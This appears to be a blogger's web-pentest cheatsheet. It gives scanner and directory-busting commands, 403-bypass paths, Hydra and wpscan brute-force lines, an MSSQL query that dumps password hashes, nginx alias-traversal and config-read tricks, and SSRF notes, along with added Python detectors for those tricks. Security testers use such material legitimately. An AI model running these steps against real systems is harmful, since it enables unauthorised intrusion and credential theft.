skywhi@dreamland:/var/log$ _


Web stuff


General Scanners

Nuclei

Before running projectdiscovery's nuclei it is highly recommended to update the templates and select the relevant ones to avoid unnecessary requests.

$ nuclei -update-directory /path/to/all_templates
$ nuclei -update-templates
$ cp -r /path/to/all_templates/{choose,your,templates} /tmp/nuclei_templates
$ # Run nuclei with GNU parallel (tip from https://twitter.com/PaulWebSec)
$ cat urls.txt | parallel --colsep '/' --jobs 10 nuclei -silent -nc \
                          -templates /tmp/nuclei_templates -o results/{3}.txt -target {1}//{3}

Enumeration

Directory busting

ffuf

gobuster

gobuster dir -edk -u <url> -w <wordlist> -o <output file>
grep -E 'Status: (200|301|302)' <output file>

Extract remote git repositories

Use GitTools:

./Dumper/gitdumper.sh <url>.git/ /tmp/lulz

Authentication Issues

Bypass "403 Forbidden"

Confusion through HTTP headers:

GET /admin HTTP/1.1
Host: target.com
==> 403 Forbidden

GET /admin HTTP/1.1
X-Original-URL: /admin
Host: target.com
==> 200 OK

Fuzz the URL:

target.com/admin ==> 403 Forbidden
target.com/%2e/admin ==> 200 OK
target.com/./admin ==> 200 OK
target.com/admin/ ==> 200 OK
target.com/admin/%2e ==> 200 OK
target.com/admin/. ==> 200 OK
target.com/admin/* ==> 200 OK

if target.com/admin/core ==> 403 Forbidden
and target.com/admin/page ==> 200 OK
then try target.com/admin/page/;core ==> 200 OK

Auth bruteforce

Hydra is pretty versatile; it supports HTTP basic/digest authentication, GET/POST forms and much more (cheatsheet here):

$ hydra -h
$ hydra -t 30 -f -o hydra.txt -L users.txt -P passwd.txt \
  -s 80 192.168.1.1 http-get /
$ # ^C to interrupt current session, creates a ./hydra.restore file
$ hydra -R # resume session

CORS

Resources:

XSS

Resources:

SSRF

If you find an SSRF possibility, then you should try to use the gopher protocol to escalate it further to RCE (check out Gopherus to craft payloads). This bug bounty report by Leeroy Jenkins shows how to hit internal firewall-protected targets via a blind SSRF with a 302 redirect trick. He then uses the gopher protocol to finally achieve RCE on a local redis server.

Request Smuggling

Resources:

Frameworks / CMS

Django

Flask

Use Flask-Unsign to read, forge or crack session tokens generated by Flask.

Spring-boot

Look for /heapdump, /env, /trace endpoints, they can contain sensitive information.

Symfony

RCE is possible via ESI fragments, check Hacktricks on Symfony (mirror of Ambionics.io).

Tomcat

Tomcat + NGINX:

https://test.example.com/manager/html => 404
https://test.example.com/foo/..;/manager/html => 200
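As an added example that is not part of the original cheatsheet, here is the defender's view of the path tricks listed in this Tomcat section and in the "Bypass 403 Forbidden" section above: a small Python scanner that flags access-log entries carrying encoded dot segments, `..;` segments, semicolon path parameters and alias-style `prefix../` traversal. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format) illustrating the
# path tricks listed above; these are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 403 162
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /%2e/admin HTTP/1.1" 200 5120
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /admin/page/;core HTTP/1.1" 200 833
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /foo/..;/manager/html HTTP/1.1" 200 2201
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /static/app.css HTTP/1.1" 200 4410
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /foobar../etc/passwd HTTP/1.1" 404 153
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each rule is (name, predicate over the raw and the percent-decoded path).
# Order matters: the first matching rule is reported for a request.
RULES = [
    ("encoded-dot-segment", lambda raw, dec: re.search(r'%2e', raw, re.I) is not None),
    ("dot-dot-segment", lambda raw, dec: re.search(r'(^|/)\.\.(/|;|$)', dec) is not None),
    ("semicolon-path-param", lambda raw, dec: ';' in dec),
    ("alias-traversal", lambda raw, dec: re.search(r'[^/]\.\./', dec) is not None),
]

def scan_access_log(text):
    """Return (ip, status, raw_path, rule_name) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, method, path, status = m.groups()
        decoded = unquote(path)
        for name, pred in RULES:
            if pred(path, decoded):
                hits.append((ip, int(status), path, name))
                break
    return hits
```

A 200 response next to one of these flags is what deserves a closer look, since it means the normalisation trick actually reached something the plain path did not.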

Intercept HTTP Traffic

Browsers

I leave this here because I always look for the proxy settings on chromium and never seem to find them. Start chromium from the command line with chromium --proxy-server=127.0.0.1:8080.

FoxyProxy is a handy add-on for Firefox and Chromium to change proxy settings on-the-fly.

CLI applications

First check out ROPNOP's post on intercepting HTTP(S) traffic from CLI-tools.

Environment variables

Some programs like curl and wget will look for specific environment variables (case sensitive) and use them as proxy settings. Either check the documentation/source of the tool if possible or just set:

$ my_proxy="127.0.0.1:8080"
$ export HTTP_PROXY="$my_proxy" http_proxy="$my_proxy" HTTPS_PROXY="$my_proxy" https_proxy="$my_proxy"
$ # run some tools, intercept requests and responses in the proxy
$ unset HTTP_PROXY http_proxy HTTPS_PROXY https_proxy

SQL Injections

MSSQL

Retrieve user hashes:

select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins

GraphQL

Tools of the trade

Introspection

Run the following introspection query to retrieve information about the schema and objects. The response can directly be copied into GraphQL Voyager (Change Schema -> Introspection) for visualisation.

query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types { ...FullType }
    directives {
      name description locations
      args { ...InputValue }
    }
  }
}

fragment FullType on __Type {
  kind name description
  fields(includeDeprecated: true) {
    name description
    args { ...InputValue }
    type { ...TypeRef }
    isDeprecated deprecationReason
  }
  inputFields { ...InputValue }
  interfaces { ...TypeRef }
  enumValues(includeDeprecated: true) {
    name description isDeprecated deprecationReason
  }
  possibleTypes { ...TypeRef }
}

fragment InputValue on __InputValue {
  name description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind name ofType {
    kind name ofType {
      kind name ofType {
        kind name ofType {
          kind name ofType {
            kind name ofType {
              kind name ofType {
                kind name
              }
            }
          }
        }
      }
    }
  }
}

Alternatively, use InQL to run introspection queries and get the results as JSON, HTML and more.

Searching for a path

Use graphql-path-enum to check which queries lead to some TargetObject; the full schema is required.

graphql-path-enum -i ./schema.json -t TargetObject

Web Servers

Nginx

Off-By-One Slash

This happens when the location prefix in nginx.conf lacks a trailing slash while the alias path has one, as in the following example:

location /foobar {
 alias /var/www/foobar/;
}

Nginx replaces the matched prefix /foobar with /var/www/foobar/, so a request to https://www.example.com/foobar../new_path/file.html is served from /var/www/new_path/file.html, i.e. it is effectively translated to https://www.example.com/new_path/file.html.

While auditing an Nginx configuration, always check that every location prefix paired with an "alias" directive ends with a trailing slash.

Missing root location

This configuration sets a root directory for the server but defines no location for /:

server {
        root /etc/nginx;

        location /hello.txt {
                try_files $uri $uri/ =404;
                proxy_pass http://127.0.0.1:8080/;
        }
}

The root directory here is /etc/nginx, yet there is no "location" block for /, so every path not matched by /hello.txt falls through to the root. A request for /nginx.conf, for example, is served from /etc/nginx/nginx.conf.
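As an added example, not code from the original page or from any of the tools listed below, here is a small Python audit for the two mistakes described above (the off-by-slash alias and the missing root location). It assumes a flat configuration with no blocks nested inside a location; the sample config is constructed.

```python
import re

# Constructed sample nginx config (not from any real deployment) showing the
# off-by-slash alias and the missing root location described above.
SAMPLE_CONF = """
server {
    root /etc/nginx;
    location /foobar {
        alias /var/www/foobar/;
    }
    location /hello.txt {
        try_files $uri $uri/ =404;
        proxy_pass http://127.0.0.1:8080/;
    }
}
"""

LOCATION_RE = re.compile(r'^\s*location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{')
ALIAS_RE = re.compile(r'^\s*alias\s+(\S+?)\s*;')
ROOT_RE = re.compile(r'^\s*root\s+\S+\s*;')

def audit_nginx(conf):
    """Return (check, location) findings for a flat (non-nested) config.

    off-by-slash: prefix location without a trailing slash plus an alias
                  with one, so /prefix../x resolves outside the alias dir.
    missing-root: server-level root but no 'location /' covering the rest
                  of the namespace, so the root directory itself is served.
    """
    findings = []
    current = None          # (modifier, prefix) of the enclosing location
    has_root = has_root_location = False
    for line in conf.splitlines():
        m = LOCATION_RE.match(line)
        if m:
            current = (m.group(1) or '', m.group(2))
            has_root_location |= current[1] == '/' and current[0] == ''
            continue
        if current is None and ROOT_RE.match(line):
            has_root = True
        m = ALIAS_RE.match(line)
        if m and current and current[0] == '':
            prefix, target = current[1], m.group(1)
            if not prefix.endswith('/') and target.endswith('/'):
                findings.append(('off-by-slash', prefix))
        if line.strip() == '}':
            current = None  # assumes locations contain no nested blocks
    if has_root and not has_root_location:
        findings.append(('missing-root', '/'))
    return findings
```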

SSRF and proxy_pass bypass

The following configuration, which interpolates captured variables into the "proxy_pass" directive, can be abused to make the server issue requests to arbitrary locations.

server {
  server_name localhost;

  location ~ /proxy/(.*)/(.*)$ {
    proxy_pass http://$1/$2;
  }
}

Some locations could be protected by IP address whitelisting:

location /secrets/ {
    allow 127.0.0.1;
    deny all;
    autoindex on;
    alias /var/www/app/secrets/;
}

In that case, try services like nip.io or rebinder to resolve a hostname to the required private IP address.

Tools

  • Gixy: tool to analyze Nginx configurations.
  • Nginxpwner: look for common Nginx misconfigurations and vulnerabilities.
  • Kyubi: discover Nginx alias traversal misconfigurations.

Resources

Misc

Apache James 2.3.2 RCE

Fuzz through NTLM authentication

Use JavaScript XHR to fuzz websites that authenticate with NTLM on every single request. This avoids having to handle the authentication process manually: simply run the JS in the browser console while already logged in to the target.

// Update me !
var baseurl = "https://www.example.com";
var method = "GET";
var wordlist = ["super", "secret", "paths"];

wordlist.forEach(function (word) {
  var xhr = new XMLHttpRequest();
  var url = baseurl + '/' + word;

  // XHR is asynchronous by default, so xhr.status is still 0 right after
  // send(); check it in the load handler instead.
  xhr.onload = function () {
    if (xhr.status == 200) {
      console.log(url);
    }
  };
  xhr.open(method, url);
  xhr.send();
});

Enumerating VHOSTs (Virtual Hosts)

ffuf -u 'http://example.com' -H 'Host: FUZZ.example.com' -w subdomains.txt -o vhosts.txt

Wordpress

Enumeration with wpscan:

wpscan --detection-mode aggressive --interesting-findings-detection aggressive --plugins-detection aggressive -e ap,at,tt,cb,dbe --rua -o wpscan.txt --url 'https://www.example.com'

Brute-force login credentials:

wpscan -U admin --passwords rockyou.txt --url 'https://www.example.com'

Webshells
